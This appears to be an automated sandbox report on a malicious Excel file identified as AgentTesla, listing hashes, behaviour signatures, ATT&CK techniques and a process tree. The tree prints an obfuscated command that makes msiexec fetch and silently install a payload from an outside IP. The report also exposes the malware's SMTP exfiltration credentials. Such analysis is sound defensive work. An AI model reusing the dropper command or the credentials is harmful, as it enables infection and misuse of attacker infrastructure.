Analysis

  • max time kernel
    144s
  • max time network
    85s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    30-06-2020 12:08

General

  • Target

    11203780.xls

  • Size

    172KB

  • MD5

    14b2d3f08ad6543c060d19748f526167

  • SHA1

    b10646324228a4b21154ef6e7d9d5469a61364e7

  • SHA256

    7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36

  • SHA512

    e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.yandex.com
  • Port:
    587
  • Username:
    pagejeffrey@yandex.com
  • Password:
    $44#@weC0*

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\11203780.xls
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/11203780.msi /qn
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\system32\msiexec.exe
        msiExec /i http://199.195.250.60/gg/11203780.msi /qn
        3⤵
        • Use of msiexec (install) with remote resource
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:108
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\Installer\MSICA82.tmp
      "C:\Windows\Installer\MSICA82.tmp"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QzxxmSogFmAhK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp699B.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:1972
      • C:\Windows\Installer\MSICA82.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        PID:1180
      • C:\Windows\Installer\MSICA82.tmp
        "{path}"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:1172

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

2
T1082

Collection

Data from Local System

3
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp699B.tmp
    MD5

    b3f0284daaab917a86328b3339b8b463

    SHA1

    a0593855a2eb96b0378c77e66e9ba345837f67fa

    SHA256

    8fd32cc48b0336567a0469b4f2ba7e136ef78b59c322e15eace1004ea34cbabb

    SHA512

    a740035edf3aea2b52f2b1577e548a0fe7ff1bbc651166967b7eff3ce9d1f728cb92a168ae65787a6e40daaa5a4917e09cc5f7cd0f9dd8da3a7e9952171732e2

  • C:\Windows\Installer\MSICA82.tmp
    MD5

    42013c93a1711781565cb1373a43f971

    SHA1

    15a6ee651a4d11d55c2c130295c0f53741a2be62

    SHA256

    dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1

    SHA512

    3b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9

  • C:\Windows\Installer\MSICA82.tmp
    MD5

    42013c93a1711781565cb1373a43f971

    SHA1

    15a6ee651a4d11d55c2c130295c0f53741a2be62

    SHA256

    dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1

    SHA512

    3b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9

  • C:\Windows\Installer\MSICA82.tmp
    MD5

    42013c93a1711781565cb1373a43f971

    SHA1

    15a6ee651a4d11d55c2c130295c0f53741a2be62

    SHA256

    dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1

    SHA512

    3b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9

  • C:\Windows\Installer\MSICA82.tmp
    MD5

    42013c93a1711781565cb1373a43f971

    SHA1

    15a6ee651a4d11d55c2c130295c0f53741a2be62

    SHA256

    dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1

    SHA512

    3b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9

  • memory/108-26-0x00000000023B0000-0x00000000023B4000-memory.dmp
    Filesize

    16KB

  • memory/108-4-0x0000000000000000-mapping.dmp
  • memory/1020-3-0x0000000000000000-mapping.dmp
  • memory/1044-6-0x0000000000F80000-0x0000000000F84000-memory.dmp
    Filesize

    16KB

  • memory/1044-7-0x0000000000F80000-0x0000000000F84000-memory.dmp
    Filesize

    16KB

  • memory/1044-5-0x0000000001D80000-0x0000000001D84000-memory.dmp
    Filesize

    16KB

  • memory/1044-25-0x0000000002550000-0x0000000002554000-memory.dmp
    Filesize

    16KB

  • memory/1044-24-0x0000000000F80000-0x0000000000F84000-memory.dmp
    Filesize

    16KB

  • memory/1044-22-0x0000000002550000-0x0000000002554000-memory.dmp
    Filesize

    16KB

  • memory/1092-2-0x0000000006140000-0x0000000006240000-memory.dmp
    Filesize

    1024KB

  • memory/1092-1-0x0000000006140000-0x0000000006240000-memory.dmp
    Filesize

    1024KB

  • memory/1092-0-0x0000000006140000-0x0000000006240000-memory.dmp
    Filesize

    1024KB

  • memory/1172-20-0x0000000000400000-0x000000000044C000-memory.dmp
    Filesize

    304KB

  • memory/1172-18-0x0000000000446ADE-mapping.dmp
  • memory/1172-21-0x0000000000400000-0x000000000044C000-memory.dmp
    Filesize

    304KB

  • memory/1172-17-0x0000000000400000-0x000000000044C000-memory.dmp
    Filesize

    304KB

  • memory/1768-13-0x0000000000000000-0x0000000000000000-disk.dmp
  • memory/1768-9-0x0000000000000000-mapping.dmp
  • memory/1972-14-0x0000000000000000-mapping.dmp